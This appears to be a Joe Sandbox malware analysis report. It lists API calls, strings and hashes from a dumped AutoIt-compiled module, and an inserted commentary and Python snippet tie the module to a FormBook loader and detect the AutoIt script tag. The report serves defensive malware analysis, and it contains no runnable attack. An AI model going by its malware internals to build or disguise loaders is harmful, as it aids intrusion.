• CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0054BB36
• DeleteObject.GDI32(00000000), ref: 0054BB5E
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0054BB74
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 2954f039920efac30ce5e7fe4cf8f5cbab6cd4adf448c8d370e5eae7868f2cca
• Instruction ID: 05d07333f69194121b02cea03e1c9cb16b3a702835c1bac7a239027d2ee47b4c
• Opcode Fuzzy Hash: 2954f039920efac30ce5e7fe4cf8f5cbab6cd4adf448c8d370e5eae7868f2cca
• Instruction Fuzzy Hash: 1E410879600204AFDB119F69DC88EEB7BB8FB9A719F104068F945D7260D7709905EB60
APIs
• __wsplitpath.LIBCMT ref: 0052DA10
• _wcscat.LIBCMT ref: 0052DA28
• _wcscat.LIBCMT ref: 0052DA3A
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052DA4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 0052DA63
• GetFileAttributesW.KERNEL32(?), ref: 0052DA7B
• SetFileAttributesW.KERNEL32(?,00000000), ref: 0052DA95
• SetCurrentDirectoryW.KERNEL32(?), ref: 0052DAA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
• Opcode ID: 98eb0d177372752eea5774209534c86aa38d9f6921bb94e1cef2255f4b8c79d3
• Instruction ID: 9b97104a14054da242e6b661c09b9eb8f499c09351f78c3b124afbe1f2727546
• Opcode Fuzzy Hash: 98eb0d177372752eea5774209534c86aa38d9f6921bb94e1cef2255f4b8c79d3
• Instruction Fuzzy Hash: 128182715082519FCB64EF65D844AAABBF4BF8A314F144C2EF889C7291E734DD84CB62
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0054C1FC
                                                                                                                      • GetFocus.USER32 ref: 0054C20C
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0054C217
                                                                                                                      • _memset.LIBCMT ref: 0054C342
                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0054C36D
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0054C38D
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0054C3A0
                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0054C3D4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0054C41C
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0054C454
                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0054C489
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1296962147-4108050209
                                                                                                                      • Opcode ID: 5bde84774f161434132025e061674d97b3d8ce1e7417d3183e7910655d059ffb
                                                                                                                      • Instruction ID: f6b9d822d06f7a3d8a27013cbf3fd4c29f5cb0cd9aafcf873cabe7770c1cfda5
                                                                                                                      • Opcode Fuzzy Hash: 5bde84774f161434132025e061674d97b3d8ce1e7417d3183e7910655d059ffb
                                                                                                                      • Instruction Fuzzy Hash: C9819D7460A301AFDB50DF14C994AABBFE8FBC8718F00492EF99597291D7B0D904DB62
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0053738F
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0053739B
                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 005373A7
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 005373B4
                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00537408
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00537444
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00537468
                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 00537470
                                                                                                                      • DeleteObject.GDI32(?), ref: 00537479
                                                                                                                      • DeleteDC.GDI32(00000006), ref: 00537480
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0053748B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                      • Opcode ID: ed0568d168760784c7fa7fa9c5b8d231fef82216fe7da29052082134532e5d36
                                                                                                                      • Instruction ID: 2ccae8cb4eedc84855201c6ac09c258af93b25adadede900188e5b46f87e46d6
                                                                                                                      • Opcode Fuzzy Hash: ed0568d168760784c7fa7fa9c5b8d231fef82216fe7da29052082134532e5d36
                                                                                                                      • Instruction Fuzzy Hash: 66513BB5904209EFCB24CFA9CC89EAEBBB9FF49310F14842DF95A97211C771A944DB50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004E0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,004C6B0C,?,00008000), ref: 004E0973
                                                                                                                        • Part of subcall function 004C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004C4743,?,?,004C37AE,?), ref: 004C4770
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 004C6BAD
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004C6CFA
                                                                                                                        • Part of subcall function 004C586D: _wcscpy.LIBCMT ref: 004C58A5
                                                                                                                        • Part of subcall function 004E363D: _iswctype.LIBCMT ref: 004E3645
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                      • API String ID: 537147316-1018226102
                                                                                                                      • Opcode ID: 4074c7a30a721a11aaa3f51c71995b544f1f029b821a80f9e30a4d916c8c40c5
                                                                                                                      • Instruction ID: 03d37a4910c876b7b87bd460d0735a8c6a6bacc4b2291dfd8483d3373e4435e3
                                                                                                                      • Opcode Fuzzy Hash: 4074c7a30a721a11aaa3f51c71995b544f1f029b821a80f9e30a4d916c8c40c5
                                                                                                                      • Instruction Fuzzy Hash: 09029D341083459FC750EF25C881EAFBBE5BF95318F00481EF586972A1DB38E989CB5A
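The string table of the function above (the #include error texts, >>>AUTOIT SCRIPT<<<, and the two literals AU3! and EA06) belongs to the AutoIt3 script loader inside the dumped module, which is what the report's "Binary is likely a compiled AutoIt script file" signature rests on. The Python below is an added triage check, not part of the Joe Sandbox report or of AutoIt: it scans a file image for the AU3!EA06 script tag and reports whether the tag is preceded by the 16-byte header that public AutoIt unpackers key on. That header value and its position directly before the tag are an assumption of this example; both sample images are constructed, not the analysed sample.

```python
"""Locate the AutoIt3 compiled-script tag in a file image.

Added example, not part of the Joe Sandbox report. "AU3!EA06" is the
concatenation of the AU3! and EA06 literals in the loader's string table;
the 16-byte magic assumed to precede it is taken from public AutoIt
unpackers and is an assumption of this example, not a fact from the report.
"""

# Assumed layout: 16-byte magic immediately followed by the "AU3!EA06" tag.
AU3_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")
AU3_SCRIPT_TAG = b"AU3!EA06"


def find_au3_markers(data: bytes) -> list:
    """Return every tag occurrence with its offset and whether the full
    header precedes it. A bare tag (no header) is just a string match and
    is not evidence of an embedded script."""
    hits, start = [], 0
    while True:
        i = data.find(AU3_SCRIPT_TAG, start)
        if i < 0:
            return hits
        n = len(AU3_MAGIC)
        hits.append({
            "offset": i,
            "full_header": i >= n and data[i - n:i] == AU3_MAGIC,
        })
        start = i + len(AU3_SCRIPT_TAG)


def is_compiled_autoit(data: bytes) -> bool:
    """True when at least one tag carries the full header."""
    return any(h["full_header"] for h in find_au3_markers(data))


def scan_file(path: str) -> dict:
    """Read a file and summarise the markers found in it."""
    with open(path, "rb") as fh:
        data = fh.read()
    return {"compiled_autoit": is_compiled_autoit(data),
            "markers": find_au3_markers(data)}


# Constructed stand-in for a PE with an appended compiled script (not the sample):
# a fake MZ stub, then header + tag, then filler.
SAMPLE_IMAGE = b"MZ" + b"\x90" * 64 + AU3_MAGIC + AU3_SCRIPT_TAG + b"\x00" * 32
# Constructed: the tag occurs only as a bare string, which must not count.
BARE_TAG_ONLY = b"MZ" + b"\x00" * 10 + AU3_SCRIPT_TAG + b"\x00" * 10

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(scan_file(sys.argv[1]))
    else:
        print(find_au3_markers(SAMPLE_IMAGE), find_au3_markers(BARE_TAG_ONLY))
```

A hit identifies the AutoIt wrapper, not the payload: legitimate AutoIt-built tools carry the same header, and the script body behind the tag still needs a dedicated unpacker before the FormBook-loading logic can be read. Run it as `python3 au3check.py <file>` (hypothetical file name) on the sample itself; the constructed images only exercise the parser.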
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00522D50
                                                                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00522DDD
                                                                                                                      • GetMenuItemCount.USER32(00585890), ref: 00522E66
                                                                                                                      • DeleteMenu.USER32(00585890,00000005,00000000,000000F5,?,?), ref: 00522EF6
                                                                                                                      • DeleteMenu.USER32(00585890,00000004,00000000), ref: 00522EFE
                                                                                                                      • DeleteMenu.USER32(00585890,00000006,00000000), ref: 00522F06
                                                                                                                      • DeleteMenu.USER32(00585890,00000003,00000000), ref: 00522F0E
                                                                                                                      • GetMenuItemCount.USER32(00585890), ref: 00522F16
                                                                                                                      • SetMenuItemInfoW.USER32(00585890,00000004,00000000,00000030), ref: 00522F4C
                                                                                                                      • GetCursorPos.USER32(?), ref: 00522F56
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00522F5F
                                                                                                                      • TrackPopupMenuEx.USER32(00585890,00000000,?,00000000,00000000,00000000), ref: 00522F72
                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00522F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3993528054-0
                                                                                                                      • Opcode ID: 88d27087d7d402927feaa9a22668010d051fc26a330f80a54a6474c0157542b9
                                                                                                                      • Instruction ID: 583b80d94ac332c793f0e919dcb4496cbcb4e76d00d77dd5920a26c1d1dd4977
                                                                                                                      • Opcode Fuzzy Hash: 88d27087d7d402927feaa9a22668010d051fc26a330f80a54a6474c0157542b9
                                                                                                                      • Instruction Fuzzy Hash: 14712B78600225BFEB218F55EC89FEABF68FF46314F140216F615AA1E0C7B15C20EB51
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005388D7
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00538904
                                                                                                                      • CoUninitialize.OLE32 ref: 0053890E
                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00538A0E
                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00538B3B
                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00552C0C), ref: 00538B6F
                                                                                                                      • CoGetObject.OLE32(?,00000000,00552C0C,?), ref: 00538B92
                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00538BA5
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00538C25
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00538C35
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                      • String ID: ,,U
                                                                                                                      • API String ID: 2395222682-3961956419
                                                                                                                      • Opcode ID: c376c92915b2c1f82ca8b1afbaa08f041cb81dea3155e0fb9b9e888cee912da4
                                                                                                                      • Instruction ID: 5c2f423f4fadec132ae029b2810adaddcc8b34a71a10a78a580d86b832658db6
                                                                                                                      • Opcode Fuzzy Hash: c376c92915b2c1f82ca8b1afbaa08f041cb81dea3155e0fb9b9e888cee912da4
                                                                                                                      • Instruction Fuzzy Hash: FAC135B1608305AFD704DF68C884A6BBBE9FF89348F00495DF98A9B251DB71ED05CB52
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      • _memset.LIBCMT ref: 0051786B
                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005178A0
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005178BC
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005178D8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00517902
                                                                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0051792A
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00517935
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0051793A
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,0053FDAD,?,?), ref: 00540E31
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004FE2A0,00000010,?,Bad directive syntax error,0054F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0051F7C2
• LoadStringW.USER32(00000000,?,004FE2A0,00000010), ref: 0051F7C9
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
• _wprintf.LIBCMT ref: 0051F7FC
• __swprintf.LIBCMT ref: 0051F81E
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0051F88D
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
APIs
  • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
  • Part of subcall function 004C7924: _memmove.LIBCMT ref: 004C79AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00525330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00525346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00525357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00525369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0052537A
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
APIs
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
APIs
• timeGetTime.WINMM ref: 00524F7A
  • Part of subcall function 004E049F: timeGetTime.WINMM(?,7694B400,004D0E7B), ref: 004E04A3
• Sleep.KERNEL32(0000000A), ref: 00524FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00524FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00524FEC
• SetActiveWindow.USER32 ref: 0052500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00525019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00525038
• Sleep.KERNEL32(000000FA), ref: 00525043
• IsWindow.USER32 ref: 0052504F
• EndDialog.USER32(00000000), ref: 00525060
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
APIs
  • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
  • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
• CoInitialize.OLE32(00000000), ref: 0052D5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0052D67D
• SHGetDesktopFolder.SHELL32(?), ref: 0052D691
• CoCreateInstance.OLE32(00552D7C,00000000,00000001,00578C1C,?), ref: 0052D6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0052D74C
• CoTaskMemFree.OLE32(?,?), ref: 0052D7A4
• _memset.LIBCMT ref: 0052D7E1
• SHBrowseForFolderW.SHELL32(?), ref: 0052D81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0052D840
• CoTaskMemFree.OLE32(00000000), ref: 0052D847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0052D87E
• CoUninitialize.OLE32(00000001,00000000), ref: 0052D880
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 0051C283
• GetWindowRect.USER32(00000000,?), ref: 0051C295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0051C2F3
• GetDlgItem.USER32(?,00000002), ref: 0051C2FE
• GetWindowRect.USER32(00000000,?), ref: 0051C310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0051C364
• GetDlgItem.USER32(?,000003E9), ref: 0051C372
• GetWindowRect.USER32(00000000,?), ref: 0051C383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0051C3C6
• GetDlgItem.USER32(?,000003EA), ref: 0051C3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0051C3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 0051C3FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: a5a64260bd6d1845ee1e1801e562f3ebf872b9a790f1b95e9e8a848c4bcab41e
                                                                                                                      • Instruction ID: a5096949ae74e3dc7ff8818922992705cf61b9427a680fb0b77951bcc95f54d8
                                                                                                                      • Opcode Fuzzy Hash: a5a64260bd6d1845ee1e1801e562f3ebf872b9a790f1b95e9e8a848c4bcab41e
                                                                                                                      • Instruction Fuzzy Hash: 5E516D75B00205AFDB08CFADDD89AAEBBBAFB98314F14852DF515D6290D7709D448B10
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004C2036,?,00000000,?,?,?,?,004C16CB,00000000,?), ref: 004C1B9A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004C20D3
                                                                                                                      • KillTimer.USER32(-00000001,?,?,?,?,004C16CB,00000000,?,?,004C1AE2,?,?), ref: 004C216E
                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 004FBCA6
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004C16CB,00000000,?,?,004C1AE2,?,?), ref: 004FBCD7
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004C16CB,00000000,?,?,004C1AE2,?,?), ref: 004FBCEE
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004C16CB,00000000,?,?,004C1AE2,?,?), ref: 004FBD0A
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004FBD1C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 641708696-0
                                                                                                                      • Opcode ID: 334165d75b20cad32cac58c272d18243e735fe1d4b101b9b541b2a07e6520c59
                                                                                                                      • Instruction ID: 56a3eea4df03e9f53f8a53bbc401716af72d0c0d3a6492f6b4ee160f738c4d6b
                                                                                                                      • Opcode Fuzzy Hash: 334165d75b20cad32cac58c272d18243e735fe1d4b101b9b541b2a07e6520c59
                                                                                                                      • Instruction Fuzzy Hash: 9461AF38100A04DFC765AF19CA48B2A77F1FB51316F24842FE64296670C7F8A895EF89
                                                                                                                      APIs
